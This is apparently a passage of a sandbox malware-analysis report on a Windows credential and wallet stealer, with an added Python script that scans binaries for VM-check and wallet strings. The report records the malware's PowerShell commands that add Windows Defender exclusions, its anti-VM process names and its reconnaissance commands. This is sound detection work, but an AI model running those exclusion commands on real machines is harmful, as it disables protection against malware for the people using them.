Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 596079
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 595954
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 595829
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 595704
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 595544
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 595384
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 595172
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 595063
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 594938
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 594813
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 594688
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 594576
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 594469
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 594344
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 594226
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 594110
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Thread delayed: delay time: 571341
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Windows Security Host.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Windows Security Host.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe Window / User API: threadDelayed 9757
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Window / User API: threadDelayed 4004
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe Window / User API: threadDelayed 5706
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6157
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3586
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6183
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3441
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6984
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2771
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2603
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7056
Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe TID: 2960 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Injector.exe TID: 6764 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Injector.exe TID: 6660 Thread sleep count: 276 > 30
Source: C:\Users\user\AppData\Local\Temp\Injector.exe TID: 6660 Thread sleep count: 204 > 30
Source: C:\Users\user\AppData\Local\Temp\Injector.exe TID: 2376 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe TID: 7364 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -599875s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -599756s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -599630s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -599500s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -599391s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -599266s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -599157s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -599032s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -598921s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -598812s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -598703s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -598594s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -598485s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -598360s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -598235s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -598110s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -597986s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -597708s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -597579s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -597454s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -597329s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -597217s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -597000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -596891s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -596766s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -596657s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -596532s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -596422s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -596310s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -596204s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -596079s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -595954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -595829s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -595704s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -595544s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -595384s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -595172s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -595063s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -594938s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -594813s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -594688s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -594576s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -594469s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -594344s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -594226s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -594110s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe TID: 7248 Thread sleep time: -571341s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7240 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628 Thread sleep count: 6183 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628 Thread sleep count: 3441 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948 Thread sleep count: 6984 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7948 Thread sleep count: 2771 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5060 Thread sleep count: 2603 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5060 Thread sleep count: 7056 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\Windows Security Host.exe TID: 5532 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Windows Security Host.exe TID: 1568 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Windows Security Host.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Windows Security Host.exe File Volume queried: C:\ FullSizeInformation
Source: Amcache.hve.23.dr Binary or memory string: VMware
Source: Injector.exe.0.dr Binary or memory string: vboxservice
Source: Amcache.hve.23.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.23.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.23.dr Binary or memory string: VMware, Inc.
Source: Injector.exe.0.dr Binary or memory string: vmwareuser
Source: Amcache.hve.23.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.23.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.23.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.23.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.23.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Injector.exe.0.dr Binary or memory string: vmsrvc
Source: Injector.exe.0.dr Binary or memory string: vmwaretray
Source: Amcache.hve.23.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.23.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.23.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Injector.exe, 00000002.00000002.1311862099.00000242BBB96000.00000004.00000020.00020000.00000000.sdmp, Windows Security Host.exe, 00000003.00000002.2487632823.000000001B564000.00000004.00000020.00020000.00000000.sdmp, BootstrapperV1.23.exe, 00000004.00000002.1593249009.000001EF9506F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe, 00000002.00000002.1312728444.00000242BD83C000.00000004.00000800.00020000.00000000.sdmp, Injector.exe.0.dr Binary or memory string: vboxtray
Source: Amcache.hve.23.dr Binary or memory string: vmci.sys
Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe, 00000002.00000002.1312728444.00000242BD83C000.00000004.00000800.00020000.00000000.sdmp, Injector.exe.0.dr Binary or memory string: qemu-ga
Source: Amcache.hve.23.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.23.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.23.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Injector.exe, 00000002.00000000.1256332897.00000242BB8D2000.00000002.00000001.01000000.00000006.sdmp, Injector.exe, 00000002.00000002.1312728444.00000242BD83C000.00000004.00000800.00020000.00000000.sdmp, Injector.exe.0.dr Binary or memory string: vmusrvc
Source: Injector.exe.0.dr Binary or memory string: vmwareservice+discordtokenprotector
Source: Amcache.hve.23.dr Binary or memory string: VMware20,1
Source: Amcache.hve.23.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.23.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.23.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.23.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.23.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.23.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.23.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Injector.exe.0.drBinary or memory string: vmtoolsd
                    Source: Amcache.hve.23.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.23.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.23.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.23.drBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                    Source: Injector.exe, 00000002.00000002.1312728444.00000242BD83C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareservice
                    Source: Amcache.hve.23.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeMemory allocated: page read and write | page guardJump to behavior
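The VM-tooling process names the sandbox found in Injector.exe (vmwareuser, vmwaretray, vmwareservice, vmtoolsd, vmsrvc, vmusrvc, vboxtray, qemu-ga) are the kind of indicator a quick `strings` triage is meant to surface, and the same scan should pick up the wallet names listed later under "Stealing of Sensitive Information" (Electrum, Bytecoin, Jaxx, com.liberty.jaxx). The catch for managed code is encoding: .NET binaries keep user strings as UTF-16LE in the #US heap, and an ASCII-only pass (the default of `strings`) never sees them. The Python below is an added example, not code from the Joe Sandbox report or from the sample: it extracts both ASCII and UTF-16LE runs from a byte blob and tags the ones matching the indicator strings quoted in this report. It assumes nothing about the real file; the blob it scans is constructed inline to resemble a .NET stealer, and the indicator sets are taken from the report's own lines.

```python
"""Extract ASCII and UTF-16LE strings from a binary blob and tag those that
match the VM/sandbox process names and wallet names quoted in this report.
Added example; the blob is constructed, not the analysed sample."""
import re
from collections import defaultdict

# Indicator sets, taken from the strings this report lists (lower-case).
INDICATORS = {
    "vm_process_check": {"vmwareuser", "vmwaretray", "vmwareservice", "vmtoolsd",
                         "vmsrvc", "vmusrvc", "vboxtray", "qemu-ga"},
    "wallet_target": {"electrum", "bytecoin", "jaxx", "com.liberty.jaxx"},
}


def extract_strings(blob: bytes, min_len: int = 5):
    """Yield (encoding, text) for every printable run of at least min_len
    characters. Managed (.NET) binaries keep user strings as UTF-16LE, which
    an ASCII-only pass never sees; the second regex catches those runs."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    for m in ascii_re.finditer(blob):
        yield "ascii", m.group().decode("ascii")
    for m in utf16_re.finditer(blob):
        yield "utf-16le", m.group().decode("utf-16-le")


def tag_strings(blob: bytes) -> dict:
    """Map indicator category -> sorted list of the strings that matched it."""
    hits = defaultdict(set)
    for _enc, text in extract_strings(blob):
        low = text.lower()
        for category, needles in INDICATORS.items():
            if any(n in low for n in needles):
                hits[category].add(text)
    return {k: sorted(v) for k, v in hits.items()}


def build_sample() -> bytes:
    """Constructed stand-in for a stealer binary: DOS stub and CLR loader
    names as ASCII, then user strings laid out UTF-16LE with NUL terminators
    the way the #US heap would hold them. Not bytes from the real sample."""
    ascii_part = (b"MZ\x90\x00" + b"This program cannot be run in DOS mode.\x00"
                  + b"mscoree.dll\x00_CorExeMain\x00")
    user_strings = ["vmwareuser", "vmtoolsd", "vboxtray", "qemu-ga",
                    "Electrum", "BytecoinJaxx!com.liberty.jaxx", "Hello World"]
    utf16_part = b"".join(s.encode("utf-16-le") + b"\x00\x00" for s in user_strings)
    return ascii_part + b"\x00" * 16 + utf16_part


if __name__ == "__main__":
    for category, strings in tag_strings(build_sample()).items():
        print(category, strings)
```

Run against a real dropped file, `tag_strings(open(path, "rb").read())` gives the same two buckets; for the command-line equivalent, `strings -el` is what adds the UTF-16LE pass. Note that a sample which decrypts its strings at runtime (as this report flags elsewhere) will only show them in a memory dump, which is why the sandbox cites .sdmp regions as well as the dropped file.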

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Yara match | File source: Process Memory Space: BootstrapperV1.23.exe PID: 4064, type: MEMORYSTR
                    Source: Yara match | File source: \Device\ConDrv, type: DROPPED
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Windows Security Host.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Windows Security Host.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe'
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | Process created: C:\Users\user\AppData\Local\Temp\Injector.exe "C:\Users\user~1\AppData\Local\Temp\Injector.exe"
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | Process created: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe "C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe"
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | Process created: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe "C:\Users\user~1\AppData\Local\Temp\BootstrapperV1.23.exe"
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Security Host.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Windows Security Host.exe'
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Security Host.exe'
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Process created: C:\Windows\System32\cmd.exe "cmd" /c ipconfig /all
                    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exe | Queries volume information: C:\Users\user\Desktop\8Hd0ZExgJz.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Injector.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
